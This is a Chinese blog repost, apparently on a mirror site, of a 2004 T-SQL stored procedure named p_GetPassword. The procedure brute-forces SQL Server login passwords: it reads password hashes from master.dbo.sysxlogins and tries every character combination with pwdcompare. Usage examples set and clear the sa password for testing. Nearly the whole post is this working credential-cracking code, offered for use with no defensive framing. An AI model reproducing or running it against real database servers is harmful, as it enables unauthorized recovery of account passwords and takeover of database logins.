zoukankan      html  css  js  c++  java

  • 发布一个SQL密码破解的存储过程(转贴)

     转自:http://community.csdn.net/Expert/topic/3271/3271317.xml?temp=.3221704

    if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[p_GetPassword]') and OBJECTPROPERTY(id, N'IsProcedure') = 1)
    drop procedure [dbo].[p_GetPassword]
    GO

    /*--穷举法破解 SQL Server 用户密码

    可以破解中文,特殊字符,字符+尾随空格的密码
    为了方便显示特殊字符的密码,在显示结果中,显示了组成密码的ASCII

    理论上可以破解任意位数的密码
    条件是你的电脑配置足够,时间足够

    --邹建 2004.08(引用请保留此信息)--*/

    /*--调用示例

    --测试特殊字符
    declare @pwd sysname
    set @pwd=char(0)+'a '
    exec sp_password null,@pwd,'sa'
    exec p_GetPassword

    --测试带空格的密码
    exec sp_password null,'a  ','sa'
    exec p_GetPassword

    --测试中文
    exec sp_password null,'我 ','sa'
    exec p_GetPassword

    --清除密码
    exec sp_password null,null,'sa'
    --*/
    create proc p_GetPassword
    @username sysname=null,--用户名,如果不指定,则列出所有用户
    @pwdlen int=3--密码破解的位数,默认只破解3位及以下的密码
    as
    --生成要破解的密码的用户表
    select name,password
    ,type=case when xstatus&2048=2048 then 1 else 0 end
    ,jm=case when password is null or datalength(password)<46
    then 1 else 0 end
    ,pwdstr=case when datalength(password)<46
    then cast(password as sysname)
    else cast('' as sysname) end
    ,pwd=cast('' as varchar(8000))
    into #pwd
    from master.dbo.sysxlogins a
    where srvid is null
    and name=isnull(@username,name)

    --生成临时表
    select top 255 id=identity(int,0,1) into #t from sysobjects a,sysobjects b
    alter table #t add constraint PK_#t primary key(id)

    --清理不需要的字符
    if not exists(select 1 from #pwd where type=1)
    delete from #t where id between 65 and 90 or id between 129 and 254

    --密码破解处理
    declare @l int
    declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000),@s4 varchar(8000)

    --破解1位密码
    select @l=0
    ,@s1='id=a.id'
    ,@s2='#t a'
    ,@s3='char(b.id)'
    ,@s4='cast(b.id as varchar)'
    exec('
    update pwd set jm=1,pwdstr='+@s3+'
    ,pwd='+@s4+'
    from #pwd pwd,#t b
    where pwd.jm=0
    and pwdcompare('+@s3+',pwd.password,pwd.type)=1
    ')

    --破解超过2位的密码
    while exists(select 1 from #pwd where jm=0 and @l<@pwdlen-1)
    begin
    select @l=@l+1
    ,@s1=@s1+',id'+cast(@l as varchar)
    +'='+char(@l/26+97)+char(@l%26+97)+'.id'
    ,@s2=@s2+',#t '+char(@l/26+97)+char(@l%26+97)
    ,@s3=@s3+'+char(b.id'+cast(@l as varchar)+')'
    ,@s4=@s4+'+'',''+cast(b.id'+cast(@l as varchar)+' as varchar)'
    exec('
    select '+@s1+' into #tt from '+@s2+'
    update pwd set jm=1,pwdstr='+@s3+'
    ,pwd='+@s4+'
    from #pwd pwd,#tt b
    where pwd.jm=0
    and pwdcompare('+@s3+',pwd.password,pwd.type)=1
    ')
    end

    --显示破解的密码
    select 用户名=name,密码=pwdstr,密码ASCII=pwd
    from #pwd
    go
  • 相关阅读:
    PHP 载入图像 imagecreatefrom_gif_jpeg_png 系列函数
    PHP 输出图像 imagegif 、imagejpeg 与 imagepng 函数
    php实现等比例不失真缩放上传图片
    PHP开发框架--CodeIgniter(CI)使用总结
    将Centos的yum源更换为国内的阿里云源
    开始投资的活动条件是什么
    复利效应 每天进步一点点到底指的是什么?
    你拥有的最宝贵的财富是什么?
    自律真的可以改变人生
    chpasswd-批量修改用户密码
  • 原文地址:https://www.cnblogs.com/rock_chen/p/155644.html
Copyright © 2011-2022 走看看